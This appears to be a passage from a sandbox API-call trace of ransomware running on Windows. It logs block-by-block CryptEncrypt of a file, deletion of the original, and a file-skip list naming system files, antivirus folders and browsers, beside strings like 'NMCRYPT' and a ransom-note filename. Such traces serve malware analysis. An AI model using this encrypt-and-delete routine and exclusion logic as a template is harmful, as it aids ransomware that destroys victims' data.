dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.347] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4638) returned 1 [0166.347] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.347] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.349] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.349] GetLastError () returned 0x0 [0166.349] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.349] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.350] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.350] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.350] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.350] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.350] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.350] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.350] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.350] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.350] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.350] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.350] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.350] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.351] GetLastError () returned 0x0 [0166.351] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.351] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x1e, lpOverlapped=0x0) returned 1 [0166.352] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x1e, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x20) returned 1 [0166.352] GetLastError () returned 0x0 [0166.352] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x20, lpOverlapped=0x0) returned 1 [0166.352] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.353] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif")) returned 0x20 [0166.353] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif", dwFileAttributes=0x20) returned 0 [0166.353] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif") returned 1 [0166.353] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif")) returned 0 [0166.353] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" [0166.353] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.353] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD5B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd5b.tmp")) returned 0xfd5b [0166.354] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD5B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd5b.tmp"), dwFlags=0x1) returned 0 [0166.354] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD5B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd5b.tmp")) returned 1 [0166.354] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0166.354] wcslen (_String="OK") returned 0x2 [0166.354] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.354] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.354] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0166.354] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0166.354] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0166.354] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.354] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*NMCRYPT") returned 0 [0166.354] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*Recovers your files.html") returned 0 [0166.354] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.exe") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.dll") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.lnk") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.bat") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.ini") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.msi") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*.scf") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*pagefile.sys*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*NTUSER.DAT*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*AppData*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\winrar\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\java\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\windows\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\ESET\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\AVG\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\AVIRA\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*Atheros*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*Realtek*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*bootmgr*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*boot*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*boot*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*CONFIG.SYS*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*IO.SYS*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*MSDOS.SYS*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*NTDETECT.COM*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*ntldr*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*chrome*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*opera*") returned 0 [0166.355] PathMatchSpecW (pszFile="To_Do_List.emf", pszSpec="*firefox*") returned 0 [0166.355] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\To_Do_List.emf", pszSpec="*") returned 1 [0166.355] strlen (_Str="NMoreira") returned 0x8 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.355] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.356] 